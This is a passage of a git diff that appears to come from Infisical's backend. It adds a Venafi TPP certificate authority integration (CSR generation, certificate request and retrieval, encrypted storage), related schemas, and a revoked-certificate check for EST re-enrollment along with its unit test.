null }; +}; + +const submitCertificateToTpp = async ({ + appConnection, + baseUrl, + accessToken, + policyDN, + csrPem, + objectName, + altNames, + workToDoTimeout = 30, + gatewayV2Service +}: { + appConnection: { gatewayId?: string | null }; + baseUrl: string; + accessToken: string; + policyDN: string; + csrPem: string; + objectName: string; + altNames?: Array<{ type: CertSubjectAlternativeNameType; value: string }>; + workToDoTimeout?: number; + gatewayV2Service: Pick; +}): Promise => { + const requestBody: TVenafiTppCertificateRequest = { + PolicyDN: policyDN, + PKCS10: csrPem, + ObjectName: objectName, + Origin: "Infisical", + DisableAutomaticRenewal: true, + WorkToDoTimeout: workToDoTimeout + }; + + if (altNames && altNames.length > 0) { + requestBody.SubjectAltNames = altNames.map(sanToVenafiFormat); + } + + logger.info( + { + policyDN, + objectName, + sanCount: requestBody.SubjectAltNames?.length ?? 0 + }, + "Venafi TPP: Submitting certificate request" + ); + + const { data, status } = await requestWithVenafiTppGateway( + appConnection, + gatewayV2Service, + { + method: "POST", + url: `${baseUrl}/vedsdk/certificates/request`, + data: requestBody, + headers: getVenafiTppHeaders(accessToken), + validateStatus: (s) => s === 200 || s === 202 + } + ); + + logger.info( + { + certificateDN: data.CertificateDN, + guid: data.Guid, + httpStatus: status, + hasCertificateData: !!data.CertificateData + }, + "Venafi TPP: Certificate request submitted" + ); + + return data; +}; + +const retrieveCertificateFromTpp = async ({ + appConnection, + baseUrl, + accessToken, + certificateDN, + includeChain = true, + gatewayV2Service +}: { + appConnection: { gatewayId?: string | null }; + baseUrl: string; + accessToken: string; + certificateDN: string; + includeChain?: boolean; + gatewayV2Service: Pick; +}): Promise<{ certificate: string; chain: string }> => { + logger.info({ certificateDN, includeChain }, "Venafi TPP: Retrieving certificate"); + + const { data, status } = await 
requestWithVenafiTppGateway( + appConnection, + gatewayV2Service, + { + method: "POST", + url: `${baseUrl}/vedsdk/certificates/retrieve`, + data: { + CertificateDN: certificateDN, + Format: "Base64", + IncludeChain: includeChain, + IncludePrivateKey: false, + RootFirstOrder: false + }, + headers: getVenafiTppHeaders(accessToken), + validateStatus: (s) => s === 200 || s === 202 + } + ); + + if (status === 202) { + logger.info({ certificateDN }, "Venafi TPP: Certificate not yet ready (202 Accepted)"); + throw new BadRequestError({ + message: "Certificate is not yet ready for retrieval. It may still be pending processing or approval." + }); + } + + if (!data.CertificateData) { + throw new BadRequestError({ message: "Venafi TPP returned empty certificate data" }); + } + + const decodedData = Buffer.from(data.CertificateData, "base64").toString("utf8"); + + const certBlocks = decodedData.match(new RE2("-----BEGIN CERTIFICATE-----[\\s\\S]*?-----END CERTIFICATE-----", "g")); + + if (!certBlocks || certBlocks.length === 0) { + throw new BadRequestError({ message: "Failed to parse certificate data from Venafi TPP response" }); + } + + const leafCert = certBlocks[0]; + const chainCerts = certBlocks.length > 1 ? 
certBlocks.slice(1).join("\n") : ""; + + logger.info( + { + certificateDN, + chainCertCount: certBlocks.length - 1 + }, + "Venafi TPP: Certificate retrieved successfully" + ); + + return { + certificate: leafCert, + chain: chainCerts + }; +}; + +export const castDbEntryToVenafiTppCertificateAuthority = ( + ca: Awaited> +): TVenafiTppCertificateAuthority & { credentials: Buffer | null | undefined } => { + if (!ca.externalCa?.id) { + throw new BadRequestError({ message: "Malformed Venafi TPP certificate authority" }); + } + + if (!ca.externalCa.appConnectionId) { + throw new BadRequestError({ + message: "Venafi TPP app connection ID is missing from certificate authority configuration" + }); + } + + const configuration = ca.externalCa.configuration as { policyDN?: string } | null; + + if (!configuration?.policyDN) { + throw new BadRequestError({ + message: "Venafi TPP policy DN is missing from certificate authority configuration" + }); + } + + return { + id: ca.id, + type: CaType.VENAFI_TPP, + enableDirectIssuance: ca.enableDirectIssuance, + name: ca.name, + projectId: ca.projectId, + credentials: ca.externalCa.credentials, + configuration: { + appConnectionId: ca.externalCa.appConnectionId, + policyDN: configuration.policyDN + }, + status: ca.status as CaStatus + }; +}; + +type TVenafiTppCertificateAuthorityFnsDeps = { + appConnectionDAL: Pick; + appConnectionService: Pick; + certificateAuthorityDAL: Pick< + TCertificateAuthorityDALFactory, + "create" | "transaction" | "findByIdWithAssociatedCa" | "updateById" | "findWithAssociatedCa" | "findById" + >; + externalCertificateAuthorityDAL: Pick; + certificateDAL: Pick; + certificateBodyDAL: Pick; + certificateSecretDAL: Pick; + kmsService: Pick; + projectDAL: Pick; + certificateProfileDAL?: Pick; + gatewayV2Service: Pick; +}; + +export const VenafiTppCertificateAuthorityFns = ({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + 
certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL, + gatewayV2Service +}: TVenafiTppCertificateAuthorityFnsDeps) => { + const createCertificateAuthority = async ({ + name, + projectId, + configuration, + actor, + status + }: { + status: CaStatus; + name: string; + projectId: string; + configuration: TCreateVenafiTppCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + }) => { + const { appConnectionId, policyDN } = configuration; + const appConnection = await appConnectionDAL.findById(appConnectionId); + + if (!appConnection) { + throw new NotFoundError({ message: `App connection with ID '${appConnectionId}' not found` }); + } + + if (appConnection.app !== AppConnection.VenafiTpp) { + throw new BadRequestError({ + message: `App connection with ID '${appConnectionId}' is not a Venafi TPP connection` + }); + } + + await appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { connectionId: appConnectionId, projectId }, + actor + ); + + logger.info({ projectId, appConnectionId, policyDN }, "Venafi TPP: Creating certificate authority"); + + const caEntity = await certificateAuthorityDAL.transaction(async (tx) => { + try { + const ca = await certificateAuthorityDAL.create( + { + projectId, + enableDirectIssuance: false, + name, + status + }, + tx + ); + + await externalCertificateAuthorityDAL.create( + { + caId: ca.id, + appConnectionId, + type: CaType.VENAFI_TPP, + configuration: { policyDN } + }, + tx + ); + + return await certificateAuthorityDAL.findByIdWithAssociatedCa(ca.id, tx); + } catch (error) { + // 23505 = unique constraint violation + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access, @typescript-eslint/no-explicit-any + if ((error as any)?.error?.code === "23505") { + throw new BadRequestError({ + message: "Certificate authority with the same name already exists in your project" + }); + } + throw error; + } + }); + + if 
(!caEntity.externalCa?.id) { + throw new BadRequestError({ message: "Failed to create Venafi TPP certificate authority" }); + } + + logger.info({ caId: caEntity.id, projectId }, "Venafi TPP: Certificate authority created successfully"); + + return castDbEntryToVenafiTppCertificateAuthority(caEntity); + }; + + const updateCertificateAuthority = async ({ + id, + configuration, + actor, + status, + name + }: { + id: string; + configuration?: TUpdateVenafiTppCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + status?: CaStatus; + name?: string; + }) => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(id); + if (!ca || !ca.externalCa) { + throw new NotFoundError({ message: `Certificate authority with ID '${id}' not found` }); + } + + const updatedCa = await certificateAuthorityDAL.transaction(async (tx) => { + if (configuration) { + if (configuration.appConnectionId) { + const appConnection = await appConnectionDAL.findById(configuration.appConnectionId); + if (!appConnection) { + throw new NotFoundError({ + message: `App connection with ID '${configuration.appConnectionId}' not found` + }); + } + if (appConnection.app !== AppConnection.VenafiTpp) { + throw new BadRequestError({ + message: `App connection with ID '${configuration.appConnectionId}' is not a Venafi TPP connection` + }); + } + + await appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { connectionId: configuration.appConnectionId, projectId: ca.projectId }, + actor + ); + } + + const existingConfig = (ca.externalCa?.configuration as { policyDN?: string } | null) || {}; + await externalCertificateAuthorityDAL.update( + { caId: id, type: CaType.VENAFI_TPP }, + { + ...(configuration.appConnectionId && { appConnectionId: configuration.appConnectionId }), + configuration: { + ...existingConfig, + ...(configuration.policyDN && { policyDN: configuration.policyDN }) + } + }, + tx + ); + } + + if (name || status) { + await 
certificateAuthorityDAL.updateById( + id, + { + name, + status + }, + tx + ); + } + + return certificateAuthorityDAL.findByIdWithAssociatedCa(id, tx); + }); + + if (!updatedCa.externalCa?.id) { + throw new BadRequestError({ message: "Failed to update Venafi TPP certificate authority" }); + } + + return castDbEntryToVenafiTppCertificateAuthority(updatedCa); + }; + + const listCertificateAuthorities = async ({ + projectId, + permissionFilters + }: { + projectId: string; + permissionFilters?: ProcessedPermissionRules; + }) => { + const cas = await certificateAuthorityDAL.findWithAssociatedCa( + { + [`${TableName.CertificateAuthority}.projectId` as "projectId"]: projectId, + [`${TableName.ExternalCertificateAuthority}.type` as "type"]: CaType.VENAFI_TPP + }, + {}, + permissionFilters + ); + + return cas.map(castDbEntryToVenafiTppCertificateAuthority); + }; + + const orderCertificateFromProfile = async ({ + caId, + profileId, + commonName, + altNames = [], + keyUsages = [], + extendedKeyUsages = [], + validity, + signatureAlgorithm, + keyAlgorithm = CertKeyAlgorithm.RSA_2048, + isRenewal, + originalCertificateId, + csr, + organization, + organizationalUnit, + country, + state, + locality + }: { + caId: string; + profileId: string; + commonName: string; + altNames?: Array<{ type: CertSubjectAlternativeNameType; value: string }>; + keyUsages?: CertKeyUsage[]; + extendedKeyUsages?: CertExtendedKeyUsage[]; + validity: { ttl: string }; + signatureAlgorithm?: string; + keyAlgorithm?: CertKeyAlgorithm; + isRenewal?: boolean; + originalCertificateId?: string; + csr?: string; + organization?: string; + organizationalUnit?: string; + country?: string; + state?: string; + locality?: string; + }) => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.VENAFI_TPP) { + logger.error( + { caId, externalCaType: ca.externalCa?.type }, + "Venafi TPP: CA is not a Venafi TPP certificate authority" + ); + throw new 
BadRequestError({ message: "CA is not a Venafi TPP certificate authority" }); + } + + const venafiCa = castDbEntryToVenafiTppCertificateAuthority(ca); + if (venafiCa.status !== CaStatus.ACTIVE) { + logger.error({ caId, status: venafiCa.status }, "Venafi TPP: Certificate authority is disabled"); + throw new BadRequestError({ message: "Certificate authority is disabled" }); + } + + logger.info( + { + caId, + profileId, + commonName, + policyDN: venafiCa.configuration.policyDN, + altNameCount: altNames.length + }, + "Venafi TPP: Starting certificate order from profile" + ); + + const certificateManagerKmsId = await getProjectKmsCertificateKeyId({ + projectId: ca.projectId, + projectDAL, + kmsService + }); + + const kmsEncryptor = await kmsService.encryptWithKmsKey({ + kmsId: certificateManagerKmsId + }); + + const { credentials, gatewayId } = await getVenafiTppConnection( + venafiCa.configuration.appConnectionId, + appConnectionDAL, + kmsService + ); + + const baseUrl = normalizeTppUrl(credentials.tppUrl); + const appConnection = { gatewayId }; + + let csrPem: string; + let skLeaf: string | undefined; + + if (csr) { + csrPem = csr; + skLeaf = undefined; + logger.info({ caId, commonName }, "Venafi TPP: Using user-provided CSR"); + } else { + let alg; + if (signatureAlgorithm) { + switch (signatureAlgorithm.toUpperCase()) { + case "RSA-SHA256": + case "SHA256WITHRSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048); + break; + case "RSA-SHA384": + case "SHA384WITHRSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_3072); + break; + case "RSA-SHA512": + case "SHA512WITHRSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_4096); + break; + case "ECDSA-SHA256": + case "SHA256WITHECDSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.ECDSA_P256); + break; + case "ECDSA-SHA384": + case "SHA384WITHECDSA": + alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.ECDSA_P384); + break; + case "ECDSA-SHA512": + case "SHA512WITHECDSA": + alg = 
keyAlgorithmToAlgCfg(CertKeyAlgorithm.ECDSA_P521); + break; + default: + alg = keyAlgorithmToAlgCfg(keyAlgorithm); + break; + } + } else { + alg = keyAlgorithmToAlgCfg(keyAlgorithm); + } + + const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]); + const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey); + skLeaf = skLeafObj.export({ format: "pem", type: "pkcs8" }) as string; + + const dnParts: string[] = [`CN=${commonName}`]; + if (organization) dnParts.push(`O=${organization}`); + if (organizationalUnit) dnParts.push(`OU=${organizationalUnit}`); + if (locality) dnParts.push(`L=${locality}`); + if (state) dnParts.push(`ST=${state}`); + if (country) dnParts.push(`C=${country}`); + const subjectDN = dnParts.join(", "); + + const sanExtensions: x509.SubjectAlternativeNameExtension[] = []; + if (altNames.length > 0) { + sanExtensions.push( + new x509.SubjectAlternativeNameExtension( + altNames.map((san) => ({ type: mapSanTypeToX509Type(san.type), value: san.value })), + false + ) + ); + } + + const csrObj = await x509.Pkcs10CertificateRequestGenerator.create({ + name: subjectDN, + keys: leafKeys, + signingAlgorithm: alg, + ...(sanExtensions.length > 0 && { extensions: sanExtensions }) + }); + + csrPem = csrObj.toString("pem"); + } + + let accessToken: string | undefined; + + try { + const authResponse = await authenticateVenafiTpp({ gatewayId, credentials }, gatewayV2Service); + accessToken = authResponse.access_token; + + const requestResponse = await submitCertificateToTpp({ + appConnection, + baseUrl, + accessToken, + policyDN: venafiCa.configuration.policyDN, + csrPem, + objectName: commonName, + altNames, + workToDoTimeout: 60, + gatewayV2Service + }); + + let certificateResult: { certificate: string; chain: string } | undefined; + + if (requestResponse.CertificateData) { + const decodedData = Buffer.from(requestResponse.CertificateData, "base64").toString("utf8"); + const certBlocks = decodedData.match( + 
new RE2("-----BEGIN CERTIFICATE-----[\\s\\S]*?-----END CERTIFICATE-----", "g") + ); + + if (certBlocks && certBlocks.length > 0) { + certificateResult = { + certificate: certBlocks[0], + chain: certBlocks.length > 1 ? certBlocks.slice(1).join("\n") : "" + }; + } + } + + if (!certificateResult) { + const maxRetries = 10; + const initialDelay = 3000; + let lastError: Error | null = null; + + for (let attempt = 0; attempt < maxRetries; attempt += 1) { + try { + certificateResult = await retrieveCertificateFromTpp({ + appConnection, + baseUrl, + accessToken, + certificateDN: requestResponse.CertificateDN, + includeChain: true, + gatewayV2Service + }); + break; + } catch (error) { + lastError = error as Error; + logger.warn( + { + attempt: attempt + 1, + maxRetries, + certificateDN: requestResponse.CertificateDN, + error: (error as Error).message + }, + "Venafi TPP: Certificate not yet available, retrying" + ); + + if (attempt < maxRetries - 1) { + const delay = initialDelay * 2 ** attempt; + await new Promise((resolve) => { + setTimeout(resolve, Math.min(delay, 30000)); + }); + } + } + } + + if (!certificateResult) { + logger.error( + { + caId, + commonName, + certificateDN: requestResponse.CertificateDN, + maxRetries, + lastError: lastError?.message + }, + "Venafi TPP: Failed to retrieve certificate after all retry attempts" + ); + throw new BadRequestError({ + message: `Certificate request submitted to Venafi TPP (DN: ${requestResponse.CertificateDN}) but failed to retrieve after ${maxRetries} attempts. The certificate may still be pending approval or processing. 
Last error: ${lastError?.message || "Unknown error"}` + }); + } + } + + let cleanedCertificatePem = certificateResult.certificate.trim(); + cleanedCertificatePem = cleanedCertificatePem + .replace(new RE2("\\r\\n", "g"), "\n") + .replace(new RE2("\\r", "g"), "\n") + .trim(); + + let certObj: x509.X509Certificate; + try { + certObj = new x509.X509Certificate(cleanedCertificatePem); + } catch (error) { + logger.error( + { + caId, + commonName, + certPemLength: cleanedCertificatePem.length, + certPemStart: cleanedCertificatePem.substring(0, 100), + parseError: error instanceof Error ? error.message : "Unknown error" + }, + "Venafi TPP: Failed to parse certificate returned from TPP" + ); + throw new BadRequestError({ + message: `Failed to parse certificate from Venafi TPP: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + + logger.info( + { + serialNumber: certObj.serialNumber, + subject: certObj.subject, + notBefore: certObj.notBefore, + notAfter: certObj.notAfter, + caId + }, + "Venafi TPP: Certificate issued successfully" + ); + + const { cipherTextBlob: encryptedCertificate } = await kmsEncryptor({ + plainText: Buffer.from(new Uint8Array(certObj.rawData)) + }); + + const certificateChainPem = certificateResult.chain || ""; + + const { cipherTextBlob: encryptedCertificateChain } = await kmsEncryptor({ + plainText: Buffer.from(certificateChainPem) + }); + + let certificateId: string; + + await certificateDAL.transaction(async (tx) => { + const cert = await certificateDAL.create( + { + caId: ca.id, + profileId, + status: CertStatus.ACTIVE, + friendlyName: commonName, + commonName, + altNames: altNames.map((san) => san.value).join(","), + serialNumber: certObj.serialNumber, + notBefore: certObj.notBefore, + notAfter: certObj.notAfter, + keyUsages, + extendedKeyUsages, + keyAlgorithm, + signatureAlgorithm, + projectId: ca.projectId, + renewedFromCertificateId: isRenewal && originalCertificateId ? 
originalCertificateId : null + }, + tx + ); + + certificateId = cert.id; + + if (isRenewal && originalCertificateId) { + await certificateDAL.updateById(originalCertificateId, { renewedByCertificateId: cert.id }, tx); + } + + await certificateBodyDAL.create( + { + certId: cert.id, + encryptedCertificate, + encryptedCertificateChain + }, + tx + ); + + if (skLeaf) { + const { cipherTextBlob: encryptedPrivateKey } = await kmsEncryptor({ + plainText: Buffer.from(skLeaf) + }); + + await certificateSecretDAL.create( + { + certId: cert.id, + encryptedPrivateKey + }, + tx + ); + } + + if (profileId && validity?.ttl && certificateProfileDAL) { + const profile = await certificateProfileDAL.findById(profileId, tx); + if (profile) { + const finalRenewBeforeDays = calculateFinalRenewBeforeDays( + profile as { apiConfig?: { autoRenew?: boolean; renewBeforeDays?: number } }, + validity.ttl + ); + if (finalRenewBeforeDays !== undefined) { + await certificateDAL.updateById(cert.id, { renewBeforeDays: finalRenewBeforeDays }, tx); + } + } + } + }); + + logger.info( + { + certificateId: certificateId!, + caId, + commonName, + serialNumber: certObj.serialNumber + }, + "Venafi TPP: Certificate stored in database" + ); + + return { + certificate: cleanedCertificatePem, + certificateChain: certificateChainPem, + privateKey: skLeaf || "", + serialNumber: certObj.serialNumber, + certificateId: certificateId!, + ca: venafiCa + }; + } catch (error: unknown) { + if (error instanceof BadRequestError || error instanceof NotFoundError) { + throw error; + } + if (error instanceof AxiosError) { + const statusCode = error.response?.status; + // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment + const responseData = error.response?.data; + + logger.error( + { + statusCode, + // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment + responseData, + caId, + commonName + }, + "Venafi TPP: Failed to issue certificate" + ); + + throw new BadRequestError({ + // 
eslint-disable-next-line @typescript-eslint/no-unsafe-member-access + message: `Venafi TPP certificate issuance failed: ${responseData?.Error || error.message}` + }); + } + logger.error(error, "Venafi TPP: Unexpected error during certificate issuance"); + throw new BadRequestError({ + message: `Venafi TPP certificate issuance failed: ${(error as Error)?.message || "Unknown error"}` + }); + } finally { + if (accessToken) { + await revokeVenafiTppToken({ gatewayId, credentials }, accessToken, gatewayV2Service); + } + } + }; + + return { + createCertificateAuthority, + updateCertificateAuthority, + listCertificateAuthorities, + orderCertificateFromProfile + }; +}; diff --git a/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas.ts b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas.ts new file mode 100644 index 00000000000..ec4ff9cada6 --- /dev/null +++ b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas.ts @@ -0,0 +1,34 @@ +import { z } from "zod"; + +import { CaType } from "../certificate-authority-enums"; +import { + BaseCertificateAuthoritySchema, + GenericCreateCertificateAuthorityFieldsSchema, + GenericUpdateCertificateAuthorityFieldsSchema +} from "../certificate-authority-schemas"; + +export const VenafiTppCertificateAuthorityConfigurationSchema = z.object({ + appConnectionId: z.string().uuid().trim().describe("The Venafi TPP App Connection ID."), + policyDN: z + .string() + .trim() + .min(1, "Policy DN is required") + .describe("The policy folder DN in Venafi TPP (e.g., '\\\\VED\\\\Policy\\\\Certificates').") +}); + +export const VenafiTppCertificateAuthoritySchema = BaseCertificateAuthoritySchema.extend({ + type: z.literal(CaType.VENAFI_TPP), + configuration: VenafiTppCertificateAuthorityConfigurationSchema +}); + +export const CreateVenafiTppCertificateAuthoritySchema = GenericCreateCertificateAuthorityFieldsSchema( + 
CaType.VENAFI_TPP +).extend({ + configuration: VenafiTppCertificateAuthorityConfigurationSchema +}); + +export const UpdateVenafiTppCertificateAuthoritySchema = GenericUpdateCertificateAuthorityFieldsSchema( + CaType.VENAFI_TPP +).extend({ + configuration: VenafiTppCertificateAuthorityConfigurationSchema.optional() +}); diff --git a/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-types.ts b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-types.ts new file mode 100644 index 00000000000..f53e74a3d6e --- /dev/null +++ b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-types.ts @@ -0,0 +1,13 @@ +import { z } from "zod"; + +import { + CreateVenafiTppCertificateAuthoritySchema, + UpdateVenafiTppCertificateAuthoritySchema, + VenafiTppCertificateAuthoritySchema +} from "./venafi-tpp-certificate-authority-schemas"; + +export type TVenafiTppCertificateAuthority = z.infer; + +export type TCreateVenafiTppCertificateAuthorityDTO = z.infer; + +export type TUpdateVenafiTppCertificateAuthorityDTO = z.infer; diff --git a/backend/src/services/certificate-common/certificate-constants.ts b/backend/src/services/certificate-common/certificate-constants.ts index 78fe1ef2ebc..967ed6550e4 100644 --- a/backend/src/services/certificate-common/certificate-constants.ts +++ b/backend/src/services/certificate-common/certificate-constants.ts @@ -1,6 +1,7 @@ export enum CertificateRequestStatus { PENDING_APPROVAL = "pending_approval", PENDING = "pending", + PENDING_VALIDATION = "pending_validation", ISSUED = "issued", FAILED = "failed", REJECTED = "rejected" diff --git a/backend/src/services/certificate-common/external-metadata-schemas.ts b/backend/src/services/certificate-common/external-metadata-schemas.ts new file mode 100644 index 00000000000..ec50a12d7ef --- /dev/null +++ b/backend/src/services/certificate-common/external-metadata-schemas.ts @@ -0,0 +1,28 @@ +import { z } from 
"zod"; + +import { AWSRegion } from "@app/services/app-connection/app-connection-enums"; +import { AwsAcmValidationMethod } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-enums"; +import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; + +export const AwsAcmPublicCaExternalMetadataSchema = z.object({ + type: z.literal(CaType.AWS_ACM_PUBLIC_CA), + arn: z.string(), + region: z.nativeEnum(AWSRegion), + validationMethod: z.nativeEnum(AwsAcmValidationMethod) +}); + +export type TAwsAcmPublicCaExternalMetadata = z.infer; + +export const DigiCertExternalMetadataSchema = z.object({ + type: z.literal(CaType.DIGICERT), + orderId: z.number().int().positive() +}); + +export type TDigiCertExternalMetadata = z.infer; + +export const ExternalMetadataSchema = z.discriminatedUnion("type", [ + AwsAcmPublicCaExternalMetadataSchema, + DigiCertExternalMetadataSchema +]); + +export type TExternalMetadata = z.infer; diff --git a/backend/src/services/certificate-est-v3/certificate-est-v3-service.test.ts b/backend/src/services/certificate-est-v3/certificate-est-v3-service.test.ts index 5b2b77d0249..f71f725b937 100644 --- a/backend/src/services/certificate-est-v3/certificate-est-v3-service.test.ts +++ b/backend/src/services/certificate-est-v3/certificate-est-v3-service.test.ts @@ -6,7 +6,8 @@ /* eslint-disable @typescript-eslint/no-explicit-any */ import { afterEach, beforeEach, describe, expect, it, vi } from "vitest"; -import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { BadRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; +import { CertStatus } from "@app/services/certificate/certificate-types"; import { CertificateRequestStatus } from "@app/services/certificate-request/certificate-request-types"; import { EnrollmentType } from "../certificate-profile/certificate-profile-types"; @@ -31,6 +32,14 @@ vi.mock("@peculiar/x509", () => ({ cRLSign: 64, 
encipherOnly: 128, decipherOnly: 256 + }, + ExtendedKeyUsage: { + clientAuth: "1.3.6.1.5.5.7.3.2", + serverAuth: "1.3.6.1.5.5.7.3.1", + codeSigning: "1.3.6.1.5.5.7.3.3", + emailProtection: "1.3.6.1.5.5.7.3.4", + ocspSigning: "1.3.6.1.5.5.7.3.9", + timeStamping: "1.3.6.1.5.5.7.3.8" } })); @@ -84,6 +93,11 @@ describe("CertificateEstV3Service", () => { findById: vi.fn() }; + const mockCertificateDAL = { + findOne: vi.fn(), + transaction: vi.fn().mockImplementation(async (cb: (tx: unknown) => unknown) => cb({})) + }; + const mockProjectDAL = { findOne: vi.fn(), updateById: vi.fn(), @@ -152,6 +166,7 @@ describe("CertificateEstV3Service", () => { certificateV3Service: mockCertificateV3Service, certificateAuthorityDAL: mockCertificateAuthorityDAL, certificateAuthorityCertDAL: mockCertificateAuthorityCertDAL, + certificateDAL: mockCertificateDAL, projectDAL: mockProjectDAL, kmsService: mockKmsService, licenseService: mockLicenseService, @@ -165,6 +180,7 @@ describe("CertificateEstV3Service", () => { mockProjectDAL.findOne.mockResolvedValue(mockProject); mockLicenseService.getPlan.mockResolvedValue(mockPlan); mockCertificatePolicyDAL.findById.mockResolvedValue(mockPolicy); + mockCertificateDAL.findOne.mockResolvedValue(null); }); afterEach(() => { @@ -412,6 +428,20 @@ describe("CertificateEstV3Service", () => { }) ).rejects.toThrow(/requires approval/i); }); + + it("should reject re-enrollment when the client certificate is revoked", async () => { + mockCertificateDAL.findOne.mockResolvedValue({ status: CertStatus.REVOKED }); + + await expect( + service.simpleReenrollByProfile({ + csr: "mock-csr", + profileId: "profile-123", + sslClientCert: encodeURIComponent("-----BEGIN CERTIFICATE-----\nMIIB...\n-----END CERTIFICATE-----") + }) + ).rejects.toThrow(UnauthorizedError); + + expect(mockCertificateV3Service.signCertificateFromProfile).not.toHaveBeenCalled(); + }); }); describe("getCaCertsByProfile", () => { diff --git 
a/backend/src/services/certificate-est-v3/certificate-est-v3-service.ts b/backend/src/services/certificate-est-v3/certificate-est-v3-service.ts index e3b6edae301..22275b8e978 100644 --- a/backend/src/services/certificate-est-v3/certificate-est-v3-service.ts +++ b/backend/src/services/certificate-est-v3/certificate-est-v3-service.ts @@ -3,7 +3,9 @@ import * as x509 from "@peculiar/x509"; import { extractX509CertFromChain } from "@app/lib/certificates/extract-certificate"; import { BadRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; import { ActorType } from "@app/services/auth/auth-type"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; import { isCertChainValid } from "@app/services/certificate/certificate-fns"; +import { CertStatus } from "@app/services/certificate/certificate-types"; import { TCertificateAuthorityCertDALFactory } from "@app/services/certificate-authority/certificate-authority-cert-dal"; import { TCertificateAuthorityDALFactory } from "@app/services/certificate-authority/certificate-authority-dal"; import { getCaCertChain, getCaCertChains } from "@app/services/certificate-authority/certificate-authority-fns"; @@ -25,6 +27,7 @@ type TCertificateEstV3ServiceFactoryDep = { certificateV3Service: Pick; certificateAuthorityDAL: Pick; certificateAuthorityCertDAL: Pick; + certificateDAL: Pick; projectDAL: Pick; kmsService: Pick; licenseService: Pick; @@ -39,6 +42,7 @@ export const certificateEstV3ServiceFactory = ({ certificateV3Service, certificateAuthorityCertDAL, certificateAuthorityDAL, + certificateDAL, projectDAL, kmsService, licenseService, @@ -249,6 +253,16 @@ export const certificateEstV3ServiceFactory = ({ }); } + // Transaction forces primary (not replica) so a just-revoked cert cannot slip through replica lag. 
+ const isRevoked = await certificateDAL.transaction(async (tx) => { + const storedCert = await certificateDAL.findOne({ serialNumber: cert.serialNumber, caId: profile.caId }, tx); + return storedCert?.status === CertStatus.REVOKED; + }); + + if (isRevoked) { + throw new UnauthorizedError({ message: "Client certificate has been revoked" }); + } + const csrObj = new x509.Pkcs10CertificateRequest(csr); if (csrObj.subject !== cert.subject) { throw new BadRequestError({ diff --git a/backend/src/services/certificate-inventory-view/certificate-inventory-view-dal.ts b/backend/src/services/certificate-inventory-view/certificate-inventory-view-dal.ts new file mode 100644 index 00000000000..be3b1283012 --- /dev/null +++ b/backend/src/services/certificate-inventory-view/certificate-inventory-view-dal.ts @@ -0,0 +1,33 @@ +import { TDbClient } from "@app/db"; +import { TableName, TCertificateInventoryViews } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify } from "@app/lib/knex"; + +export type TCertificateInventoryViewDALFactory = ReturnType; + +export const certificateInventoryViewDALFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.CertificateInventoryView); + + const findByProjectId = async (projectId: string, userId?: string): Promise => { + try { + const query = db + .replicaNode()(TableName.CertificateInventoryView) + .where({ projectId }) + .andWhere((qb) => { + void qb.where({ isShared: true }); + if (userId) { + void qb.orWhere((inner) => { + void inner.where({ createdByUserId: userId, isShared: false }); + }); + } + }) + .orderBy("name", "asc"); + + return (await query) as TCertificateInventoryViews[]; + } catch (error) { + throw new DatabaseError({ error, name: "Find certificate inventory views by project" }); + } + }; + + return { ...orm, findByProjectId }; +}; diff --git a/backend/src/services/certificate-inventory-view/certificate-inventory-view-service.ts 
b/backend/src/services/certificate-inventory-view/certificate-inventory-view-service.ts new file mode 100644 index 00000000000..a131ef93df3 --- /dev/null +++ b/backend/src/services/certificate-inventory-view/certificate-inventory-view-service.ts @@ -0,0 +1,256 @@ +import { ForbiddenError } from "@casl/ability"; + +import { ActionProjectType } from "@app/db/schemas"; +import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; +import { TProjectPermission } from "@app/lib/types"; + +import { TPermissionServiceFactory } from "../../ee/services/permission/permission-service-types"; +import { ProjectPermissionActions, ProjectPermissionSub } from "../../ee/services/permission/project-permission"; +import { NON_PQC_KEY_ALGORITHMS, PQC_KEY_ALGORITHMS } from "../certificate/certificate-dal"; +import { TCertificateInventoryViewDALFactory } from "./certificate-inventory-view-dal"; +import { + TCreateInventoryViewDTO, + TDeleteInventoryViewDTO, + TListInventoryViewsDTO, + TUpdateInventoryViewDTO +} from "./certificate-inventory-view-types"; + +type TSystemViewFilters = { + status?: string[]; + notAfterTo?: string; + keyAlgorithm?: string[]; +}; + +type TSystemView = { + id: string; + name: string; + filters: 